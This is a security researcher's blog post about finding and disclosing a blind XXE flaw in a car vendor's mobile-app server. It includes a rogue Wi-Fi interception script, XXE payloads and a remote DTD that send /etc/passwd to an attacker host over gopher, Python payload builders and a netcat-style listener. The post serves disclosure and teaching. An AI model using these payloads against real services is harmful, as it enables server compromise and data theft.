How bad web applications affect the security of your vehicle

Update – 03 Nov 2015

After publishing this post, it came to our attention that a number of other researchers had identified and reported the exact same vulnerability. Despite this, the fix still took well over a year. This demonstrates a typical failure of the “responsible disclosure” process. How many others may have identified this vulnerability and what are the chances they all had good intentions?

Intro

In the past few years, the security world has heard a lot of buzz about the “Internet of Things”. Vulnerabilities in everything from toasters to home automation systems have been demonstrated, lending more and more credibility to “movie hacking” style attacks (check that pool on your roof for leaks).

Following a similar trend, at the Black Hat security conference this past year, well-known car hackers Charlie Miller and Chris Valasek made a splash with the first fully remote attack against a large number of Jeep vehicles. Their attack relied on the fact that these vehicles’ head units actually connect to the Internet through the Sprint mobile network – the same network used by Sprint mobile phones. By connecting themselves to this same network, they were able to identify target vehicles and exploit vulnerabilities in the software that runs on a number of the head units!

Our accidental adventure into car hacking starts before this, back in the days when “car hacking” involved riding in the passenger seat of the “target” vehicle amid a mess of wires, with your computer plugged into the dash. Charlie and Chris recently found a really interesting way into the heart of the car remotely from the Internet. In this post, we’ll show that there’s more than one way to skin a cat, even if you can’t afford a brand new car.

Never on Schedule, Always on Time

Any story that begins with 4 hackers crammed into a tiny room with nothing to do is bound to end poorly. Unfortunately, that’s where this tale begins.

On a sunny July morning in our tiny 26th-floor office (office 2600, in fact), our offensive security team had come from all over the country for some face time. In the room were our four consultants and a mess of hardware from a failed attempt at building a password cracking machine – one of the projects for the week. These week-long gatherings happen only a couple of times per year and are typically scheduled around interesting client projects so that the team can collaborate in person, usually resulting in severe pwnage and lots of new ideas. Unfortunately, clients being clients, this would not be the case.

On the first day of scheduled testing, everything fell apart. The two projects that had been lined up were delayed for reasons beyond our control. Further, the hardware for the password cracking machine proved to be particularly bonked and our efforts with a soldering iron went unrewarded. By day 2, we had 4 hackers in a tiny office and nothing at all to do…

Hackers gon’ Hack

After arriving fashionably late, our resident technophile and IoT aficionado, David, began recounting his latest project. Apparently a large vendor of home security products had recently installed a new system in his house that runs on mostly off-the-shelf hardware. A standard 802.11 wireless network is stood up so that sensors and devices can communicate. This network is protected by a WPA2 key that is not provided to the end user – unacceptable to David.

In addition to the glaring risks posed by such a system (exposure of the key generation scheme, trivial denial of service via a microwave oven, etc…), David also mentioned that it came with a cool mobile app so that you could manage your security system remotely!

Hearing this, Steve spun up a wireless access point using airbase-ng and immediately typed in a series of iptables commands, all syntactically correct on the first try – a feat worthy of its very own blog post. It looked something like the following:

```bash
#!/bin/bash
# Rogue access point that redirects web traffic to an intercepting proxy.
# Device mon0 must be in monitor mode (created by airmon-ng below).
# Assumes dhcpd.conf has a subnet declaration for 192.168.2.128/25.
# Adjust the IP addresses in the iptables rules at the bottom: the DNS rule
# forwards to a public resolver, and the last four rules should point at the
# machine running the proxy. To proxy through Mallory instead, set the port
# to the Mallory port (20755).

# The script must be run as root
if [ "$(id -u)" -ne 0 ]; then
    echo "Please run this script as root." >&2
    exit 1
fi

# Put wlan0 into monitor mode and bring up the uplink on eth0
airmon-ng start wlan0
service network-manager stop
sleep 5
ifconfig eth0 up
dhclient eth0

# Broadcast the CONNECT_HERE network on channel 7; airbase-ng creates at0
airbase-ng -c 7 -e CONNECT_HERE mon0 &
sleep 5
ifconfig at0 up
ifconfig at0 192.168.2.129 netmask 255.255.255.128
route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
dhcpd -d -f -pf /var/run/dhcp-server/dhcpd.pid at0 &
sleep 5

# Start from a clean slate
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

# Route and NAT client traffic out through eth0
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT

# DNS from AP clients goes to a public resolver; web ports go to the proxy
iptables -t nat -A PREROUTING -i at0 -p udp --dport 53 -j DNAT --to-destination 8.8.8.8
iptables -t nat -A PREROUTING -i at0 -p tcp --dport 80 -j DNAT --to-destination 192.168.174.162:54321
iptables -t nat -A PREROUTING -i at0 -p tcp --dport 443 -j DNAT --to-destination 192.168.174.162:54321
iptables -t nat -A PREROUTING -i at0 -p tcp --dport 8080 -j DNAT --to-destination 192.168.174.162:54321
iptables -t nat -A PREROUTING -i at0 -p tcp --dport 8443 -j DNAT --to-destination 192.168.174.162:54321
```

Next, BurpSuite was launched and set up to listen on port 54321 (with invisible proxying enabled, since the phone has no idea it is being proxied). The net effect was that a wireless network called CONNECT_HERE was created. For any device connected to the network, all traffic destined for HTTP-related services (ports 80, 443, 8080, and 8443) would instead be sent to BurpSuite, where it could be inspected, modified, and replayed.

This post isn’t about security systems (perhaps another time). It suffices to say that in short order the team found a way to turn off David’s (and anyone else’s) security system without their password. Fun.

What About the Cars?

Right, back on track. Feeling unstoppable, and in possession of David’s phone, Justin made an interesting observation. Apparently David had recently purchased a new car, which surprised no one, as he seems to change cars more often than most of us change underwear. This new car came with a convenient mobile application that lets the user control the locks, horn, and alarm, locate the car remotely via GPS, etc…

Unfortunately, we didn’t get a chance to take a deep look at this application or to talk in detail about how it handles authentication, authorization, and registration, all of which would be very interesting subjects. What we did do was connect it to our “CONNECT_HERE” network and take a peek at the traffic the application was generating.

XML XXE FTW WTF

Upon seeing the traffic in Burp, it became immediately apparent that the application was communicating with the backend server using an XML-based API. The following was the first request we saw originate from the phone to the server (note that all company names and David’s personal information have been censored or modified):

```http
POST /mobileservices/services/accountservice/authenticateV2/ HTTP/1.1
Host: carcompany.someprovider.com
Accept-Encoding: gzip, deflate
Content-Type: application/xml
Content-Length: 402
Accept-Language: en-us
Accept: */*
Connection: keep-alive
User-Agent: CarCompany Application

MAPP TOS xxxxxxxx 2014-07-10%2017:36:10 CarCompany US iPhone 12345678 1234 ab123babdbabababababababa123bababababa123babababababababababa123 101329
```

One of the first things we look for when we see XML is a vulnerability called XML External Entity injection, or XXE.

XML XXE

XXE is a common flaw introduced by application developers when parsing XML input. Any time a web application sends XML to the server, the server has to parse that XML before it can make use of the data. This parsing is usually performed by one of a handful of off-the-shelf libraries.

The developers of these libraries made the decision that a feature in XML known as “external entities” should be enabled by default, and that it is up to the application developer to disable it. A simple XML document that demonstrates external entities is shown below:

```xml
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///home/notes.txt" >]>
<fileContent>&xxe;</fileContent>
```

The simple example above would take the contents of the file “notes.txt” and insert them into the XML document under the “fileContent” tag. Keeping in mind that this code is running on the server, and that the untrusted client (the potential attacker) is the one supplying the XML input, I’m sure you can see the problem. An attacker can read arbitrary files and list the contents of directories on the server’s file system. Further, if the attacker specifies an “http://” URL instead of a local “file://” one, the server will make an HTTP request to the URL specified.
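To make the “enabled by default” point concrete, here is a minimal local sketch using Python’s standard-library SAX parser. This is not whatever the car service actually ran (the post doesn’t say). Python exposes external entity resolution as the `feature_external_ges` flag; since Python 3.7.1 it defaults to off, so the sketch switches it on explicitly to mimic a permissive parser. The helper names (`parse_text`, `xxe_document`) and the temporary `notes.txt` are illustrative only.

```python
import io
import pathlib
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Records every chunk of character data the parser reports."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_text(document: bytes, resolve_external_entities: bool) -> str:
    """Parse `document` and return all of its character data.

    When resolve_external_entities is True, the parser fetches whatever an
    external entity's SYSTEM identifier points at (file://, http://, ...)
    and splices it into the document: exactly the XXE behaviour.
    """
    handler = TextCollector()
    parser = xml.sax.make_parser()
    parser.setContentHandler(handler)
    parser.setFeature(feature_external_ges, resolve_external_entities)
    parser.parse(io.BytesIO(document))
    return "".join(handler.chunks)


def xxe_document(file_uri: str) -> bytes:
    """The example document from the post, pointed at `file_uri`."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE foo [\n"
        f'<!ENTITY xxe SYSTEM "{file_uri}" >]>\n'
        "<fileContent>&xxe;</fileContent>\n"
    ).encode()


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        notes = pathlib.Path(tmp) / "notes.txt"
        notes.write_text("TOP SECRET notes")
        doc = xxe_document(notes.as_uri())
        # Resolution on: the file's contents end up in the parsed text.
        # Resolution off: the entity reference is silently dropped.
        print("resolving:", repr(parse_text(doc, True)))
        print("ignoring: ", repr(parse_text(doc, False)))
```

Parsers in other languages expose equivalent switches under different names; in every case the safe choice is to turn entity resolution (ideally DTD processing altogether) off.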

Combine this with the fact that application servers can be managed over HTTP, and that the credentials for those web interfaces often reside in files on the local server, and the result frequently spells disaster. There are a number of more complex XXE tricks, such as using the Gopher protocol to send nearly arbitrary TCP data and force the server to interact with non-HTTP services, but we won’t get into those here.

XXE in the Car Application

With a slightly better understanding of the XXE vulnerability, let’s take another look at the request made by the car application, and what an XXE payload inserted into this request might look like:

```http
POST /mobileservices/services/accountservice/authenticateV2/ HTTP/1.1
Host: carcompany.someprovider.com
Accept-Encoding: gzip, deflate
Content-Type: application/xml
Content-Length: 402
Accept-Language: en-us
Accept: */*
Connection: keep-alive
User-Agent: CarCompany Application

<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://abcd.dns.attackers.com/" >]>
MAPP TOS xxxxxxxx 2014-07-10%2017:36:10 CarCompany US iPhone 12345678 &xxe; ab123babdbabababababababa123bababababa123babababababababababa123 101329
```

An astute reader may have spotted a problem with our earlier description of XXE. That’s okay; we were just keeping you on your toes. While it is true that our request can force the server to read files off its file system, we can’t necessarily force it to send what it read back to us in the response.

What we can do, however, is use XXE to force the server to make an outbound HTTP request to a server that we own on the Internet. Even if we don’t see the result of this request directly, since we own the server at “abcd.dns.attackers.com” we can check our logs to see whether the request came through, confirming that our XXE attack on the target was successful. Craftier still, we as attackers can own the DNS server for the domain “dns.attackers.com”. When the target machine tries to look up the DNS record for “abcd.dns.attackers.com”, as in the payload above, we see the lookup in our logs. So even if outbound HTTP traffic is blocked at the target server, we still get confirmation of success.
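The “abcd” label in the payload is a placeholder. A common refinement, sketched below in Python under our own assumptions, is to mint a fresh random label for every probe and then search the DNS/HTTP logs for it, so a hit can be tied back to the exact request that caused it. `dns.attackers.com` is the post’s stand-in domain; the function names and the log line format used in the test are hypothetical, since DNS servers log in many different formats.

```python
import secrets


def new_probe_hostname(base_domain: str = "dns.attackers.com") -> str:
    """Return a fresh, unguessable hostname under a domain whose DNS we control."""
    return f"{secrets.token_hex(4)}.{base_domain}"  # 8 random hex chars


def oob_probe_doctype(hostname: str) -> str:
    """DOCTYPE declaring an external entity that points at our hostname."""
    return (
        "<!DOCTYPE foo [\n"
        "<!ELEMENT foo ANY >\n"
        f'<!ENTITY xxe SYSTEM "http://{hostname}/" >]>'
    )


def probe_fired(log_lines, hostname: str) -> bool:
    """True if any DNS or HTTP log line mentions the probe hostname.

    Matching is case-insensitive because some resolvers randomise the case
    of query names (the "DNS 0x20" technique).
    """
    needle = hostname.lower()
    return any(needle in line.lower() for line in log_lines)


if __name__ == "__main__":
    host = new_probe_hostname()
    print(oob_probe_doctype(host))
```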

As Justin and Steve sat side by side, about to fire off the payload, David and Ketil were tinkering with the cracking machine in the background. Justin’s screen showed an SSH session to the server at abcd.dns.attackers.com, monitoring the logs; Steve was running Burp. Neither Justin nor Steve really expected this to work, but it was worth trying. Shortly after Steve hit the “Go” button in Burp Repeater, Justin yelled “OH SH*T!”, indicating success. Ketil and David, taken totally by surprise, jumped up to see what all the commotion was about – it’s unclear whether David even knew we were hacking his car at this point.

Not So Blind XXE

If this were a real penetration test (or attack), XXE would only be the first step, the crucial toe in the door. From here, the attackers would move into the company’s internal network, using this initial machine as a pivot. While it is not trivial, in every real engagement where we have discovered XXE, we have found some way to leverage it to compromise an internal machine.

Since this was not a penetration test or attack, we took just one more step to demonstrate the severity of the vulnerability during the “responsible” disclosure process. Because most people don’t know what XXE is, or how this type of “blind” XXE can be leveraged to retrieve files, we decided to pull the “/etc/passwd” file from the remote system as a demonstration.

Leveraging some more cool XML tricks, the following request was sent:

```http
POST /mobileservices/services/accountservice/authenticateV2/ HTTP/1.1
Host: carcompany.someprovider.com
Accept-Encoding: gzip, deflate
Content-Type: application/xml
Content-Length: 402
Accept-Language: en-us
Accept: */*
Connection: keep-alive
User-Agent: CarCompany Application

<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://abcd.dns.attackers.com/file.dtd">
%dtd;]>
MAPP TOS xxxxxxxx 2014-07-10%2017:36:10 CarCompany US iPhone 12345678 &send; ab123babdbabababababababa123bababababa123babababababababababa123 101329
```

The above request references a file on the remote, attacker-controlled server at http://abcd.dns.attackers.com/file.dtd. That file contains the following XML:

```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'gopher://abcd.dns.attackers.com:443/xxe?%file;'>">
%all;
```

In essence, the target server is being asked to request the resource “gopher://abcd.dns.attackers.com:443/xxe?%file;”. This time, though, we are leveraging the XXE attack so that “%file;” expands to the contents of “/etc/passwd” (or any other file) on the target server. We use the Gopher protocol here because it tolerates strange characters, like newlines, that would cause an HTTP request to misbehave. With Gopher we can put almost arbitrary content in the URI and have the request go through – pretty great!
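The payload is split across the request and `file.dtd` for a reason: the XML specification forbids parameter-entity references inside markup declarations in the internal subset, so the “`%file;` inside an entity value” step has to live in an external DTD. The Python sketch below (our own helper, not the team’s tooling) simply assembles both pieces from the post, with the target path and attacker host as parameters; the request body then references `&send;`. Whether `gopher://` is actually followed depends on the URL schemes the target’s parser and runtime support.

```python
def build_oob_xxe(target_path: str, attacker_host: str, exfil_port: int = 443):
    """Return (doctype_for_request, remote_dtd) for the two-stage blind XXE.

    Stage 1, inline in the request: declare %file; (the target file) and
    %dtd; (our remote DTD), then expand %dtd;.
    Stage 2, served as http://<attacker_host>/file.dtd: define a general
    entity `send` whose Gopher URL embeds the expanded %file;.
    """
    doctype = (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE foo [\n"
        "<!ELEMENT foo ANY >\n"
        f'<!ENTITY % file SYSTEM "file://{target_path}">\n'
        f'<!ENTITY % dtd SYSTEM "http://{attacker_host}/file.dtd">\n'
        "%dtd;]>"
    )
    remote_dtd = (
        '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
        '<!ENTITY % all "<!ENTITY send SYSTEM '
        f"'gopher://{attacker_host}:{exfil_port}/xxe?%file;'>\">\n"
        "%all;"
    )
    return doctype, remote_dtd


if __name__ == "__main__":
    request_dtd, file_dtd = build_oob_xxe("/etc/passwd", "abcd.dns.attackers.com")
    print(request_dtd)
    print(file_dtd)
```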



So how do we actually receive the contents of the /etc/passwd file? If you look closely at the Gopher request, it is being sent to “abcd.dns.attackers.com” on TCP port 443. We can simply start a netcat listener on that port and wait for the goods to roll in, as shown in the screenshot above!
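netcat is all that’s needed here. For completeness, a rough Python stand-in for a one-shot `nc -l` listener is sketched below; the function names are ours. Binding to port 443 normally requires root. A Gopher client sends its request and then waits for a reply, so the sketch stops either when the peer closes the connection or after it goes quiet for a few seconds. How exactly the data looks on the wire (for example, whether it arrives URL-encoded) depends on the target’s implementation.

```python
import socket


def open_listener(host: str = "0.0.0.0", port: int = 443) -> socket.socket:
    """Bind a TCP socket and start listening (port 443 usually needs root)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind((host, port))
    sock.listen(1)
    return sock


def receive_one(listener: socket.socket, idle_timeout: float = 5.0,
                bufsize: int = 65536) -> bytes:
    """Accept one connection and return what arrives until the peer closes
    it or sends nothing for `idle_timeout` seconds."""
    conn, _addr = listener.accept()
    chunks = []
    with conn:
        conn.settimeout(idle_timeout)
        while True:
            try:
                data = conn.recv(bufsize)
            except socket.timeout:  # client is waiting for a reply; stop
                break
            if not data:  # peer closed the connection
                break
            chunks.append(data)
    return b"".join(chunks)


if __name__ == "__main__":
    with open_listener() as srv:
        print(receive_one(srv).decode("latin-1"))
```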

Hypothetical Impact

In theory, at this point the application that receives communication from users’ mobile devices, and then relays the commands to their car, is compromised. What does that mean for David and his peers?

First off, it is unclear whether this vulnerability is limited to the single manufacturer we tested. The vulnerable service is hosted by a major provider, and the XML request included a field identifying the car company:

CarCompany

This vulnerability likely affected multiple car vendors.

Second – once an application server is compromised, the database almost always quickly follows. The application needs to talk to the database, and credentials for it can be found in configuration files. This means that the complete list of cars and credentials to control them through the application would likely have been available to the attackers.

Included in this control would be at least:

- GPS tracking capability
- Make and model information
- Control of locks and lights

There are probably many other great features as well; David has since moved on to a new car, and we no longer have access to the application for reference.

Even more concerning would be remote attacks against the car’s CAN bus. Charlie and Chris had to jump through some hoops to get from the media console to the CAN bus. This application, however, seems to talk directly to systems on the CAN bus to perform the operations it is responsible for. That means it is possible an attacker could gain full remote control of electronic systems in all affected vehicles.

Responsible Disclosure

Our team reached out to the affected vendor, eventually getting in touch with their IT security group. We described the issue and delivered an official escalation report. The vendor seemed uneasy and unprepared to deal with such an escalation; however, they did confirm receipt of the report.

Fast-forward six months: our team decided to check on the status of the issue. We loaded the saved request into BurpSuite and sent it to the remote server. Sure enough – still vulnerable.

It wasn’t until Justin reached out to the vendor again, a full year after the original disclosure, that the vulnerability was actually remediated. The remediation in this case is a very quick fix in the XML parsing code. This is not the first time our team has seen this type of slow reaction from a big company to a critical level vulnerability in high profile software.
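The post doesn’t show the vendor’s actual fix, and their stack isn’t named. As a hedged illustration of how small such a change can be, the Python sketch below parses a flat XML request with the standard-library expat bindings and refuses any document containing a DOCTYPE; with no DTD, no entities of any kind can be declared. Java’s Xerces-based parsers offer the same policy through the `http://apache.org/xml/features/disallow-doctype-decl` feature. `parse_request` and `DTDForbidden` are hypothetical names.

```python
import xml.parsers.expat


class DTDForbidden(ValueError):
    """Raised when a request body contains a DOCTYPE declaration."""


def parse_request(body: bytes) -> dict:
    """Parse a flat XML request into {element_name: text}, refusing any DTD."""
    parser = xml.parsers.expat.ParserCreate()
    values = {}
    open_elements = []  # stack of [element name, list of text chunks]

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Fires at "<!DOCTYPE", before any entity declaration is processed.
        raise DTDForbidden(f"DOCTYPE {name!r} not allowed in request body")

    def on_start(name, attrs):
        open_elements.append([name, []])

    def on_chars(data):
        if open_elements:
            open_elements[-1][1].append(data)

    def on_end(name):
        tag, chunks = open_elements.pop()
        text = "".join(chunks).strip()
        if text:
            values[tag] = text

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = on_chars
    parser.EndElementHandler = on_end
    parser.Parse(body, True)  # exceptions raised in handlers propagate here
    return values
```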

Unfortunately, the “responsible” in responsible disclosure too often applies only to the group that found the issue, not to the one responsible for creating it. Experiences like these lend credibility to vulnerability disclosure policies like Google’s “coordinated disclosure” process, where the bug goes public after three months regardless.